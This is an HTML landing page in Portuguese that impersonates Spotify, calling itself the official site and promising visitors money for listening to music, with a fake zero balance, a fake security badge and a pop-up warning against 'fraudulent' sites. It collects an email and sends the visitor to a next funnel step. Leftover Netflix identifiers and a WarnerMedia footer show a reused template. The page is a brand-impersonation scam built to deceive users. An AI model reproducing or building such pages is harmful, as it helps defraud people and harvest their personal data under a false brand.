<!DOCTYPE html><html lang="pt-br"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <title>Spotify</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
    <link href="css2" rel="stylesheet">
    <link href="sf-pro-display" rel="stylesheet">
    <link rel="shortcut icon" href="images/logo.png.png">

    <style>

        html, body {
        overflow-x: hidden;
        }

        #netflixlogoapp{
            width: 100px;
            margin: 20px;
            margin-top: 25px;
        }

        #netflixlogoapp2{
            width: 300px;
            margin-right: 50px;
            margin-bottom: 10px;
            margin-left: 50px;
            margin-top: 60px;
        }

        *{
            margin: 0px;
            font-family: 'SF Pro Display', sans-serif;
            font-weight: 700;
            padding: 0px;
        }
        body{
            background-image: linear-gradient(to bottom, #040f50, #060e46, #090c3c, #0c0932, #0c0528);
        }
        #barranetflix{
            background: linear-gradient( #000000, rgba(12, 12, 12, 0));
            display: flex;
            justify-content: space-between;
            margin: 0px;
        }
        #bannerprincipal{
            background-image: url('images/banner.png') ;
            background-position: center; /* Center the image */
            background-repeat: no-repeat; /* Do not repeat the image */
            background-size: cover;
        }
        #textoprincipal{
            color: white;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            text-align: center;
            font-size: 20px;
            font-weight: -50px;
            margin: 20px;
        }
        #ganheassistindocaixa{
            padding: 5px;
            text-align: center;
            font-size: 23px;
            margin-bottom: 20px;
            font-weight: 700;
            margin-top: 10px;
            background-color: #0f79af;
            width: 60%;
        }
        #textodetalhelogin{
            font-size: 15px;
            margin-top: 20px;
            margin-left: 10px;
            margin-right: 10px;
            font-weight: 500;
        }
        #inputtypetext{
            border: 1px solid rgba(255, 255, 255, 0.616);
            background: linear-gradient(135deg, rgba(255, 255, 255, 0.1), rgba(255, 255, 255, 0));
            backdrop-filter: blur(10px);
            -webkit-backdrop-filter: blur(10px);
            -webkit-box-shadow: 0px 0px 44px 10px rgba(0,0,0,0.93);
            -moz-box-shadow: 0px 0px 44px 10px rgba(0,0,0,0.93);
            box-shadow: 0 8px 32px 0 rgba(0, 0, 0, 0.37);
            border:1px solid rgba(255, 255, 255, 0.18);
            color: white;
            width: 80%;
            border-radius: 10px;
            margin-top: 20px;
            padding: 13px 15px;
            font-weight: 700;
        }
        a{
            text-decoration: none;
        }
        #botaoproximaetapa{
            padding: 15px;
            font-weight: 800;
            width: 50%;
            margin-top: 10px;
            color: white;
            border-radius: 15px;
            font-size: 18px;
            background-color: #002be7;
            animation: breathing 2s ease-in-out infinite;
            transition: background-color 0.3s ease; /* Transição suave de cor */

        }

        #botaoproximaetapaa{
            padding: 15px;
            font-weight: 800;
            width: 50%;
            margin-top: 20px;
            color: white;
            border-radius: 15px;
            font-size: 18px;
            background-color: #002be7;
            transition: background-color 0.3s ease; /* Transição suave de cor */
        }

        #botaolucraretapa{
            background: linear-gradient(rgb(0, 0, 0, 0), #090a41);
            display: flex;
            justify-content: center;
            align-items: center;
            padding: 0px 0px 20px 0px;
            text-align: center;
        }
        #botaolucraretapaa{
            display: flex;
            justify-content: center;
            margin-top: -90px;
            align-items: center;
            padding: 0px 0px 20px 0px;
            text-align: center;
            animation: breathing 2s ease-in-out infinite;
        }

        @keyframes breathing {
        0% {
        transform: scale(1);
        }
        50% {
        transform: scale(1.03); /* Reduzi a escala para evitar problemas de layout */
        }
        100% {
        transform: scale(1);
        }
        }


        #informativo{
            padding: 10px;
            margin: 10px;
            margin-top: 5px;
            display: flex;
            margin-left:  -150px;
            justify-content: center;
            align-items: center;
            border-radius: 5px;
            height: 200px;
        }
        #pipocanetflix{
            width: 30px;
        }
        #dinheirologo{
            width: 60px;
        }
        .tvnetflix{
            width: 90%;
        }

        #tvnetflixaax{
            margin-top: 15px;
            margin-bottom: ;
            width: 370px;
            margin-left: -60px;
        }

        #tvnetflixapp{
            width: 150px;
            height: 150px;
            position: relative;
        }
        #videomp4net{
            width: 200px;
            margin-left: 50px;
            margin-top: 30px;
        }
        #informativo div:first-child {
            width: 150px;
            height: 150px;
            position: relative;
        }
        #informativo div:last-child {
            width: 150px;
            height: 150px;
            position: relative;
            margin-top: -150px;
            margin-left: 20px;
        }
        #textodetalhelogindd{
            color: white;
            padding: 30px;
            font-family: 'SF Pro Display', sans-serif;
            font-size: 18px;
            font-weight: 450;
            margin-top: -35px;
            margin-bottom: -15px;
            text-align: center;
        }
        footer{
            color: white;
            height: 120px;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            margin-right: 40px;
            margin-left: 40px;
        }
        #saldolead{
            margin-right: 20px;
            padding: 14px 20px;
            background-color: #00FF00;
            height: 15px;
            border-radius: 10px;
            display: flex;
            margin-top:15px;
            justify-content: center;
            align-items: center;
            color: white;

        }


        #popupBackground {
            display: none; /* Inicialmente oculto */
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.678);
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 1000;
        }

        /* Estilos para o pop-up */
        #popup {
            background: linear-gradient(135deg, rgba(255, 255, 255, 0.1), rgba(255, 255, 255, 0));
            backdrop-filter: blur(10px);
            -webkit-backdrop-filter: blur(10px);
            -webkit-box-shadow: 0px 0px 44px 10px rgba(0,0,0,0.93);
            -moz-box-shadow: 0px 0px 44px 10px rgba(0,0,0,0.93);
            box-shadow: 0 8px 32px 0 rgba(0, 0, 0, 0.37);
            border:1px solid rgba(255, 255, 255, 0.18);
            margin-right: 25px;
            margin-left: 25px;
            padding: 20px;
            border-radius: 20px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
            max-width: 500px;
            width: 100%;
            text-align: center;
            opacity: 0;
            transform: translateY(-20px); /* Inicialmente, o pop-up está ligeiramente deslocado para cima */
            transition: opacity 0.5s ease, transform 0.5s ease; /* Animação suave */
        }

        /* Estilos para o botão */
        #closeButton {
            background-color: #002be7;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.4);
            color: white;
            border: none;
            padding: 13px 50px;
            border-radius: 10px;
            cursor: pointer;
            font-size: 16px;
            margin-top: 30px;
            margin-bottom: 5px;
            animation: breathing 2s ease-in-out infinite;
        }

        #closeButton:hover {
            background-color: #1cda45;
        }

        #siteoficial{
            margin-bottom: 20px;
            color: white;
        }

        #textooficial{
            margin-bottom: 15px;
            color: rgb(218, 218, 218);
            font-weight: 500;
            margin-right: 10px;
            margin-left: 10px;
        }

        #titulooficial{
            color: white;
            margin-top: 20px;
            font-size: 30px;
            font-weight: 900;
        } 
        
        #textoaltoficial{
            color: rgb(218, 218, 218);
            font-weight: 500;
            margin-right: 10px;
            margin-left: 10px;
        }

        #linha-horizontal {
        width: 200px;
        border: 1px solid rgba(255, 255, 255, 0.137);
        border-radius: 100px;
        margin: 0 auto;
        margin-bottom: 15px;
        }

        #googleseguro{
            width: 80px;
            margin-top: 15px;
        }

        #maxtitulo{
            width: 100px;
        }

        body.no-scroll {
            overflow: hidden;
        }

        #botaoproximaetapa.disabled {
            background-color: gray;
            cursor: not-allowed;
        }

        #botaoproximaetapaa.disabled {
            background-color: gray;
            cursor: not-allowed;
        }

        
    </style>
</head>
<body class="no-scroll">
    <script language="Javascript">
        <!--SAI DAQUI TOPO DE FUNIL-->
        <!--
        //-->
        </script>

    <!-- Estrutura do pop-up -->
    <div id="popupBackground" style="display: flex;">
        <div id="popup" style="opacity: 1; transform: translateY(0px);">
            <div><img src="images/seguro.png" id="maxtitulo"></div>
            <h2 id="titulooficial"><b>ATENÇÃO</b></h2>
            <p id="siteoficial">Você está no Site Oficial Spotify!</p>

            <div id="linha-horizontal"></div>

            <p id="textooficial">Fique atento a outros sites que podem estar tentando enganar você com avaliações falsas e ofertas fraudulentas.</p>
            <p id="textoaltoficial">Para garantir a segurança e a autenticidade, não utilize ou compartilhe qualquer outra plataforma que não seja esta.</p>
            <button id="closeButton">Estou Ciente</button>
            <div><img src="images/site-seguro.png" id="googleseguro"></div>
        </div>
    </div>

    <script>
        document.addEventListener("DOMContentLoaded", function() {
            let popupBackground = document.getElementById("popupBackground");
            let popup = document.getElementById("popup");
            let closeButton = document.getElementById("closeButton");

            // Exibe o fundo e o pop-up com animação
            popupBackground.style.display = "flex";
            document.body.classList.add("no-scroll"); // Desativa a rolagem da página

            setTimeout(function() {
                popup.style.opacity = "1";
                popup.style.transform = "translateY(0)"; // Move o pop-up para sua posição final
            }, 10); // Pequeno atraso para que a transição seja visível

            // Fecha o pop-up ao clicar no botão com animação de saída
            closeButton.addEventListener("click", function() {
                popup.style.opacity = "0";
                popup.style.transform = "translateY(20px)"; // Move o pop-up para baixo
                setTimeout(function() {
                    popupBackground.style.display = "none"; // Esconde o fundo após a animação
                    document.body.classList.remove("no-scroll"); // Reativa a rolagem da página
                }, 500); // Tempo correspondente à duração da animação
            });
        });
    </script>



    <div id="bannerprincipal">
        <div id="barranetflix">
            <img src="images/logo.png" id="netflixlogoapp">
            <div id="saldolead">Saldo: R$ <b>0,00</b></div>
        </div>
        <div id="textoprincipal">
            <img src="images/logo.png" id="netflixlogoapp2">
            <p>MUITO MAIS A VER</p>

            <p id="textodetalhelogin">
                <b>Quer ganhar assistindo?</b> Informe-nos seu email e comece agora mesmo:
            </p>
            <input type="email" id="inputtypetext" placeholder="Informe seu E-Mail*" required="">
        </div>
        <div id="botaolucraretapa">
            <a href="../2" id="botaoproximaetapa" class="disabled">COMEÇAR AGORA</a>
        </div>

        <script>
            document.addEventListener("DOMContentLoaded", function() {
                const emailInput = document.getElementById("inputtypetext");
                const nextStepButton = document.getElementById("botaoproximaetapa");
    
                // Verifica se o e-mail é válido
                function isValidEmail(email) {
                    const emailPattern = /^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/;
                    return emailPattern.test(email);
                }
    
                // Ativa/desativa o botão com base na validade do e-mail
                emailInput.addEventListener("input", function() {
                    if (isValidEmail(emailInput.value)) {
                        nextStepButton.classList.remove("disabled");
                    } else {
                        nextStepButton.classList.add("disabled");
                    }
                });
    
                // Previne o redirecionamento se o e-mail não for válido
                nextStepButton.addEventListener("click", function(event) {
                    if (!isValidEmail(emailInput.value)) {
                        event.preventDefault();
                        alert("Por favor, insira um e-mail válido.");
                    }
                });
            });
        </script>

    </div>

    <p id="textodetalhelogindd">
        A Spotify tem muito mais a ver com você e toda a família. Pra quem curte músicas e agora, colocar <b>Dinheiro no Bolso!</b>    </p>
    <div id="informativo">
        <div id="tvnetflixapp">
            <div><img src="" id="videomp4net"></div>
            <div><img src="images/logocelular.png" id="tvnetflixaax"></div>
        </div>
    </div>
    
    <div id="botaolucraretapaa">
        <a href="../2" id="botaoproximaetapaa" class="disabled">INICIAR AGORA</a>
    </div>

    <script>
        document.addEventListener("DOMContentLoaded", function() {
            const emailInput = document.getElementById("inputtypetext");
            const nextStepButton = document.getElementById("botaoproximaetapaa");

            // Verifica se o e-mail é válido
            function isValidEmail(email) {
                const emailPattern = /^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/;
                return emailPattern.test(email);
            }

            // Ativa/desativa o botão com base na validade do e-mail
            emailInput.addEventListener("input", function() {
                if (isValidEmail(emailInput.value)) {
                    nextStepButton.classList.remove("disabled");
                } else {
                    nextStepButton.classList.add("disabled");
                }
            });

            // Previne o redirecionamento se o e-mail não for válido
            nextStepButton.addEventListener("click", function(event) {
                if (!isValidEmail(emailInput.value)) {
                    event.preventDefault();
                    alert("Por favor, insira um e-mail válido.");
                }
            });
        });
    </script>

    <footer>
        <p style="font-size: 12px; text-align: center; font-weight: 300">©2024 WarnerMedia Direct Latin America, LLC. Todos os direitos reservados. Max é usado sob licença.</p>
    </footer>
<script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>

</body></html>